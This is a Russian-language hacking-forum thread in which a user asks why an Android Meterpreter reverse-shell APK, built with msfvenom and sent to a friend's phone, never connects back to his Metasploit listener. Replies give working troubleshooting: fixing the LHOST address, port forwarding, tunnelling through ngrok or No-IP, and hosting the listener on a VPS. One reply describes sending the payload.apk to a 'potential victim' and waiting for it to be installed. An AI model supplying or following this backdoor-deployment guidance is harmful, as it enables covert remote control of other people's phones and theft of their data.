Проблема Не подключается пэйлоад

D

DoomGuyB

Здравствуйте, вообщем проблема такая, создал я значит через Termux пэйлоад по такой схеме
Код: 
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=4444 R > Payload.apk
Попросил подругу помочь с тестом, установила она его на телефон и запустила, я попытался подключиться
Код: 
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.102
set LPORT 4444
И всё... 10 минут ждал подключение и нечего не произошло, подруга запускала повторно но результата всё нет, и нет.
Может кто-то что-то подскажит?
 

Вложения

  • Screenshot_2018-08-15-09-00-03.png
    Screenshot_2018-08-15-09-00-03.png
    81,4 КБ · Просмотры: 251
  • Нравится
Реакции: AlexF
L

Letun

Green Team
08.02.2018
50
30
BIT
0
на новых версиях андроида не работает, пробуй на 4-5
 
N1GGA

N1GGA

Codeby Team
Администратор
16.07.2018
374
357
BIT
542
Подскажем. Две возможные причины.
1. У тебя в сети закрыт порт для входящих подключений. Если у тебя маршрутизатор(роутер), ищи как открыть порт в роутере. Если и это не помогло, гугли "Обход NAT".
2. У твоей подружки на ведроиде стоить антивирь, который заблочил твой бекдор.
 
kot-gor

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Да какой NAT, если 192.168.2.102 ))) , я так предпологаю, тестирует в своей внутренней сети. Какая у вас версия андройда?
 
  • Нравится
Реакции: CHEATER и Underwood
D

DoomGuyB

GoodSmile сказал(а):
Подскажем. Две возможные причины.
1. У тебя в сети закрыт порт для входящих подключений. Если у тебя маршрутизатор(роутер), ищи как открыть порт в роутере. Если и это не помогло, гугли "Обход NAT".
2. У твоей подружки на ведроиде стоить антивирь, который заблочил твой бекдор.
Нажмите, чтобы раскрыть...

Маловероятно, у неё нет антивируса) и Гугл защита отключена
 
Tayrus

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Вас не смущают предупреждения при запуске метасплоита?
2018-08-15_12-50-23.png
 
O

OneDollar

Твоя " подруга" в локальной сети??? Если нет, проброс портов делай. В роутере переадресацию поищи...
 
Tayrus

Tayrus

Red Team
13.04.2017
365
787
BIT
6
DoomGuyB сказал(а):
Нет
Нажмите, чтобы раскрыть...
Тогда могу предположить что вы под натом
Вот диапазоны :

10. 0. 0. 0 - 10. 255.255.255
172. 16. 0. 0 - 172. 31.255.255
192.168. 0. 0 - 192.168.255.255 # У вас 192.168.2.102

Вы можете воспользоваться ngrok, чтобы решить эту проблему: Обходим NAT
Или порт открыть.
 
  • Нравится
Реакции: AlexF и Sphinx
Tayrus

Tayrus

Red Team
13.04.2017
365
787
BIT
6
DoomGuyB сказал(а):
Если имеется ввиду открытие портов у меня на роутере - уже сделано, сейчас снова буду тестить
если у подруги - сама она это хрен сделает)0))
Нажмите, чтобы раскрыть...
Это все у вас делать надо либо ngrok либо порты откройте либо другой какой-нибудь вариант.
 
kot-gor

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Подруга находится в другом сегменте сети,)) я вижу настройки для внутреннего сегмента сети.. что бы вам граммотно подсказать, вы можете описать топологию сети подруги и вашей?. Если она с внешней сети, то у вас неправильно скомпонована полезная нагрузка, а именно ее ip.
 
Последнее редактирование:
D

DoomGuyB

kot-gor сказал(а):
Подруга находится в другом сегменте сети,)) я вижу настройки для внутреннего сегмента сети.. что бы вам граммотно подсказать, вы можете описать топологию сети подруги и вашей?. Если она с внешней сети, то у вас неправильно скомпонована полезная нагрузка.
Нажмите, чтобы раскрыть...
Можешь подсказать как её скомпоновать правильно?
 
kot-gor

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Все очень просто, если подруга во внешнем сегменте сети, то указываете ip в полезной нагрузке внешнее..правда ip должен у вас быть белый и в идеале статическим, если динамический ip , то используете NO-ip или ngrok.А лучше поднимите на vps листенер..тогда в apk указываете IP vps.
 
  • Нравится
Реакции: Sphinx
D

DoomGuyB

kot-gor сказал(а):
Все очень просто, если подруга во внешнем сегменте сети, то указываете ip в полезной нагрузке внешнее..правда ip должен у вас быть белый и в идеале статическим, если динамический ip , то используете NO-ip или ngrok.А лучше поднимите на vps листенер..тогда в apk указываете IP vps.
Нажмите, чтобы раскрыть...
Спасибо, уже разбираюсь с ngrok.
 
U

user345

у меня такая-же проблема
как сделать это в локальной сети?
т.е мы подключены к одному вифи
пошагово
как исправить данную проблему?
 
S

Sphinx

user345 сказал(а):
у меня такая-же проблема
как сделать это в локальной сети?
т.е мы подключены к одному вифи
пошагово
как исправить данную проблему?
Нажмите, чтобы раскрыть...
В принципе, в локальной сети не должно возникать никаких сложностей.
Необходимо указать IPv4-адрес (192.168.x.x) именно локальной сети при создании полезной нагрузки, а также как параметр LHOST в msfconsole.
Далее, всё проще: отправить потенциальной жертве сгенерированный payload.apk и ожидать установки, и, собственно, открытия приложения.
Если сессия не подаёт признаков жизни, значит на смартфоне установлена антивирусная защита. Данная защита — не обязательно стороннее ПО. Защита может поставляться в комплекте с операционной системой (обычно Android 5.0+).
 
  • Нравится
Реакции: Catharsis, Define и kot-gor
kot-gor

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Для локальной сети(когда все находятся в одном сегменте сети, всё должно работать.)
 
  • Нравится
Реакции: Sphinx
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ